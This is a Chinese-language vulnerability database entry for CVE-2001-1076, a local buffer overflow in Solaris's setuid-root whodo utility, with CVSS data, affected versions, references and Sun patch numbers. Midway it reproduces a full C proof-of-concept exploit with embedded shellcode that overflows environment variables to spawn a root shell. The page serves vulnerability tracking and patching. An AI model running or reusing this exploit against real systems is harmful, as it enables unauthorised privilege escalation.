CVE-2001-1076
CVSS7.2
发布时间 :2001-07-05 00:00:00
修订时间 :2008-09-10 15:09:37
NMCOES    

[原文]Buffer overflow in whodo in Solaris SunOS 5.5.1 through 5.8 allows local users to execute arbitrary code via a long (1) SOR or (2) CFIME environment variable.


[CNNVD]Solaris whodo缓冲区溢出漏洞(CNNVD-200107-053)

        Solaris SunOS 5.5.1到5.8版本中的whodo存在缓冲区溢出漏洞。本地用户可以借助超长(1)SOR或(2) CFIME环境变量执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:8.0
cpe:/o:sun:solaris:2.5::x86
cpe:/o:sun:solaris:2.5
cpe:/o:sun:sunos:5.5.1Sun Microsystems Solaris 2.5.1
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:8.0::x86
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:sunos:5.8Sun SunOS (formerly Solaris 8) 5.8
cpe:/o:sun:sunos:5.7Sun Microsystems Solaris 7
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:47Solaris 8 whodo Buffer Overflow Vulnerability
oval:org.mitre.oval:def:34Solaris 7 whodo Buffer Overflow Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1076
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1076
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-053
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/2935
(VENDOR_ADVISORY)  BID  2935
http://archives.neohapsis.com/archives/bugtraq/2001-07/0076.html
(VENDOR_ADVISORY)  BUGTRAQ  20010705 Solaris whodo Vulnerability
http://xforce.iss.net/static/6802.php
(VENDOR_ADVISORY)  XF  solaris-whodo-bo(6802)

- 漏洞信息

Solaris whodo缓冲区溢出漏洞
高危 缓冲区溢出
2001-07-05 00:00:00 2005-10-20 00:00:00
本地  
        Solaris SunOS 5.5.1到5.8版本中的whodo存在缓冲区溢出漏洞。本地用户可以借助超长(1)SOR或(2) CFIME环境变量执行任意代码。

- 公告与补丁

        Patches are available for Sparc and Intel versions of Solaris.
        Sun Solaris 8_x86
        

  •         Sun 111827-01
            

  •         

        Sun Solaris 8
        

  •         Sun 111826-01
            

  •         

        Sun Solaris 2.5
        

  •         Sun 111838-01
            

  •         

        Sun Solaris 2.5 _x86
        

  •         Sun 111839-01
            

  •         

        Sun Solaris 2.5.1 _x86
        

  •         Sun 111841-01
            

  •         

        Sun Solaris 2.5.1
        

  •         Sun 111840-01
            

  •         

        Sun Solaris 2.6
        

  •         Sun 111859-01
            

  •         

        Sun Solaris 2.6 _x86
        

  •         Sun 111860-01
            

  •         

        Sun Solaris 7.0
        

  •         Sun 111600-01
            

  •         

        Sun Solaris 7.0 _x86
        

  •         Sun 111601-01
            

  •         

- 漏洞信息 (20974)

Solaris 2.6/2.6/7.0/8 whodo Buffer Overflow Vulnerability (EDBID:20974)
solaris local
2001-06-01 Verified
0 Pablo Sor
N/A [点击下载]
source: http://www.securityfocus.com/bid/2935/info

The 'whodo' utility shipped with Sun Microsystems' Solaris provides a listing of users online and their activities. It is installed setuid root because it reads from the 'utmp' log as well as from the process table.

'whodo' contains a buffer overflow which can be exploited to gain root privileges.

#include <fcntl.h>

/*
   /usr/sbin/i86/whodo overflow proof of conecpt.

   Pablo Sor, Buenos Aires, Argentina 06/2001
   psor@afip.gov.ar, psor@ccc.uba.ar

   works against x86 solaris 8

   default offset +/- 100  should work.

*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{

char shell[]=
 "\xeb\x48\x9a\xff\xff\xff\xff\x07\xff\xc3\x5e\x31\xc0\x89\x46\xb4"
 "\x88\x46\xb9\x88\x46\x07\x89\x46\x0c\x31\xc0\x50\xb0\x8d\xe8\xdf"
 "\xff\xff\xff\x83\xc4\x04\x31\xc0\x50\xb0\x17\xe8\xd2\xff\xff\xff"
 "\x83\xc4\x04\x31\xc0\x50\x8d\x5e\x08\x53\x8d\x1e\x89\x5e\x08\x53"
 "\xb0\x3b\xe8\xbb\xff\xff\xff\x83\xc4\x0c\xe8\xbb\xff\xff\xff\x2f"
 "\x62\x69\x6e\x2f\x73\x68\xff\xff\xff\xff\xff\xff";

  unsigned long magic = get_esp() + 1180;  /* default offset */

  unsigned char buf[800];
  char *env;

  env = (char *) malloc(400*sizeof(char));
  memset(env,0x90,400);
  memcpy(env+160,shell,strlen(shell));
  memcpy(env,"SOR=",4);
  buf[399]=0;
  putenv(env);
  
  memset(buf,0x41,800);
  memcpy(buf+271,&magic,4);
  memcpy(buf,"CFTIME=",7);
  buf[799]=0;
  putenv(buf);

  system("/usr/sbin/i86/whodo");
}
		

- 漏洞信息

8697
Solaris whodo Multiple Variable Local Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

- 时间线

2001-06-01 Unknow
2001-06-01 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Solaris whodo Buffer Overflow Vulnerability
Boundary Condition Error 2935
No Yes
2001-07-05 12:00:00 2009-07-11 06:56:00
Discovered by Pablo Sor <psor@afip.gov.ar>.

- 受影响的程序版本

Sun Solaris 2.5.1 _x86
Sun Solaris 2.5.1
Sun Solaris 8_x86
Sun Solaris 8_sparc
Sun Solaris 7.0_x86
Sun Solaris 7.0
Sun Solaris 2.6_x86
Sun Solaris 2.6
Sun Solaris 2.5_x86
Sun Solaris 2.5

- 漏洞讨论

The 'whodo' utility shipped with Sun Microsystems' Solaris provides a listing of users online and their activities. It is installed setuid root because it reads from the 'utmp' log as well as from the process table.

'whodo' contains a buffer overflow which can be exploited to gain root privileges.

- 漏洞利用

An exploit written by Pablo Sor &lt;psor@afip.gov.ar&gt; is available:

- 解决方案

Patches are available for Sparc and Intel versions of Solaris.


Sun Solaris 2.6
  • Sun 111859-01


Sun Solaris 7.0
  • Sun 111600-01


Sun Solaris 8_x86
  • Sun 111827-01


Sun Solaris 2.6_x86
  • Sun 111860-01


Sun Solaris 8_sparc
  • Sun 111826-01


Sun Solaris 2.5
  • Sun 111838-01


Sun Solaris 7.0_x86
  • Sun 111601-01


Sun Solaris 2.5_x86
  • Sun 111839-01


Sun Solaris 2.5.1 _x86
  • Sun 111841-01


Sun Solaris 2.5.1
  • Sun 111840-01

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站